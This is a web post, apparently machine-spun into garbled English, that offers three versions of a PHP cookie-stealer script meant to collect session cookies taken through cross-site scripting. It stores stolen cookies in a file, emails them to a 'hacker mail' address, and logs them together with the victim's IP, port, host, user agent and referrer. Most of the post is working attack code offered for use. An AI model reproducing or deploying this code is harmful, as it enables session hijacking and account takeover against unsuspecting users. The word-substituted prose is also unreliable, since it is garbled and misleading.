Here is the unproblematic Cookie Stealer code
Version One: Cookie stored inwards File
$steal = fopen(“cookiefile.txt”, “a”); This opened upwards the cookiefile inwards append fashion in addition to thence that nosotros tin append the stolen cookie.
fwrite($steal, $cookie .”\\n”); This volition shop the stolen cookie within the file.
fclose($steal); unopen the opened file.
Version Two: Sends cookies to the hacker mail
Version Three: picayune flake advanced
Version One: Cookie stored inwards File
<?php$cookie = $HTTP_GET_VARS[“cookie”]; pocket the cookie from the electrical flow url(stealer.php?cookie=x)and shop the cookies inwards $cookie variable.
$cookie = $HTTP_GET_VARS[“cookie”];
$steal = fopen(“cookiefile.txt”, “a”);
fwrite($steal, $cookie .”\\n”);
fclose($steal);
?>
$steal = fopen(“cookiefile.txt”, “a”); This opened upwards the cookiefile inwards append fashion in addition to thence that nosotros tin append the stolen cookie.
fwrite($steal, $cookie .”\\n”); This volition shop the stolen cookie within the file.
fclose($steal); unopen the opened file.
Version Two: Sends cookies to the hacker mail
<?phpThe inwards a higher house code volition post the cookies to hacker post using the PHP() post operate amongst discipline “Stolen cookies”.
$cookie = $HTTP_GET_VARS[“cookie”]; mail(“hackerid@mailprovider.com”, “Stolen Cookies”, $cookie);
?>
<?phpThe inwards a higher house Cookie stealer volition shop the next information:
operate GetIP()
{
if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP”), “unknown”))
$ip = getenv(“HTTP_CLIENT_IP”);
else if (getenv(“HTTP_X_FORWARDED_FOR”) && strcasecmp(getenv(“HTTP_X_FORWARDED_FOR”), “unknown”))
$ip = getenv(“HTTP_X_FORWARDED_FOR”);
else if (getenv(“REMOTE_ADDR”) && strcasecmp(getenv(“REMOTE_ADDR”), “unknown”))
$ip = getenv(“REMOTE_ADDR”);
else if (isset($_SERVER[‘REMOTE_ADDR’]) && $_SERVER[‘REMOTE_ADDR’] && strcasecmp($_SERVER[‘REMOTE_ADDR’], “unknown”))
$ip = $_SERVER[‘REMOTE_ADDR’];
else
$ip = “unknown”;
return($ip);
}
operate logData()
{
$ipLog=”log.txt”;
$cookie = $_SERVER[‘QUERY_STRING’];
$register_globals = (bool) ini_get(‘register_gobals’);
if ($register_globals) $ip = getenv(‘REMOTE_ADDR’);
else $ip = GetIP();
$rem_port = $_SERVER[‘REMOTE_PORT’];
$user_agent = $_SERVER[‘HTTP_USER_AGENT’];
$rqst_method = $_SERVER[‘METHOD’];
$rem_host = $_SERVER[‘REMOTE_HOST’];
$referer = $_SERVER[‘HTTP_REFERER’];
$date=date (“l dS of F Y h:i:s A”);
$log=fopen(“$ipLog”, “a+”);
if (preg_match(“/\bhtm\b/i”, $ipLog) || preg_match(“/\bhtml\b/i”, $ipLog))
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>”);
else
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n”);
fclose($log);
}
logData();
?>
- Ip address
- port number
- host(usually computer-name)
- user agent
- cookie
